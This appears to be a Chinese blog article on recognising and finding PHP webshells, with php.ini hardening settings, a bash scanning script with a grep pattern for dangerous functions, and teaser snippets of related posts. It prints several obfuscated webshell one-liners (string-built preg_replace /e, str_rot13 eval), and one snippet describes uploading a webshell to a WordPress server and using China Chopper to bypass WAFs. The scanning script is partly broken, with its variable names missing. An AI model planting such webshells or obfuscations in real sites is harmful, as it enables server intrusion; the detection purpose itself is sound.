常見的木馬基本上有如下特徵
1.接收外部變數
常見如:$_get,$_post
更加隱蔽的$_files,$_request…
2.執行函式
獲取資料後還需執行它
常見如:eval,assert,preg_replace
隱藏變種:
include($_post[『a』]);
$hh = 「p」.」r」.」e」.」g」.」_」.」r」.」e」.」p」.」l」.」a」.」c」.」e」;
$hh(「/[discuz]/e」,$_post[『h』],」access」);
@preg_replace(『/ad/e』,』@』.str_rot13(『riny』).'($b4dboy)』, 『add』);
使用urldecode,gzinflate,base64_decode等加密函式
3.寫入檔案
獲取更多的許可權
如:copy,file_get_contents,exec
一般的建議是開啟safe_mode 或使用disable_functions 等來提公升安全性;
可能有些程式無法正常執行,基本的安全設定
php.ini中
expose_php = off
register_globals = off
display_errors = off
cgi.fix_pathinfo=0
magic_quotes_gpc = on
allow_url_fopen = off
allow_url_include = off
配置open_basedir
查詢木馬指令碼
查詢隱藏特徵碼及入口可以找出大部分的木馬.
#!/bin/bash
findpath=./
logfile=findtrojan.log
echo -e $(date +%y-%m-%d_%h:%m:%s)」 start\r」 >>$logfile
echo -e 『**********==changetime list**********\r\n』 >> $
find $ -name 「*.php」 -ctime -3 -type f -exec ls -l {} \; >> $
echo -e 『**********==nouser file list**********\r\n』 >> $
find $ -nouser -nogroup -type f -exec ls -l {} \; >> $
echo -e 『**********==php one word trojan **********\r\n』 >> $
find $ -name 「*.php」 -exec egrep -i -i -c1 -h 『exec\(|eval\(|assert\(|system\(|passthru\(|shell_exec\(|escapeshellcmd\(|pcntl_exec\(|gzuncompress\(|gzinflate\(|unserialize\(|base64_decode\(|file_get_contents\(|urldecode\(|str_rot13\(|\$_get|\$_post|\$_request|\$_files|\$globals』 {} \; >> $
#使用使用-l 代替-c1 -h 可以只列印檔案名
echo -e $(date +%y-%m-%d_%h:%m:%s)」 end\r」 >>$logfile
more $logfile
一句話木馬
一句話木馬短小精悍,而且功能強大,隱蔽性非常好,在入侵中始終扮演著強大的作用。一句話木馬 服務端 是用於本地的html提交指令碼木馬檔案 就是我們要用來插入到asp檔案中的asp語句,不僅僅是以asp為字尾的資料庫檔案 該語句將回為觸發,接收入侵者通過客戶端提交的資料,執行並完成相應的操作,服務端的...
php一句話木馬變形技巧
一句話木馬就是只需要一行 的木馬,短短一行 就能做到和大馬相當的功能。為了繞過waf的檢測,一句話木馬出現了無數中變形,但本質是不變的 木馬的函式執行了我們傳送的命令。我們可以通過get post cookie這三種方式向乙個 提交資料,一句話木馬用 get post cookie 接收我們傳遞的資...
wordpress測試php一句話木馬 菜刀!!
工具 菜刀 一句話木馬php 各種變樣,asp的木馬都有具體能不能繞過看你能力了 將乙個話木馬寫入乙個執行檔案 檔名為admin.php 需要隱蔽性比較強的話可以和混用 真實的攻擊環境絕不會這麼簡單 將檔案上傳到需要測試的伺服器並記錄下你木馬的url 比如 通過這個url就可以通過菜刀獲取 的web...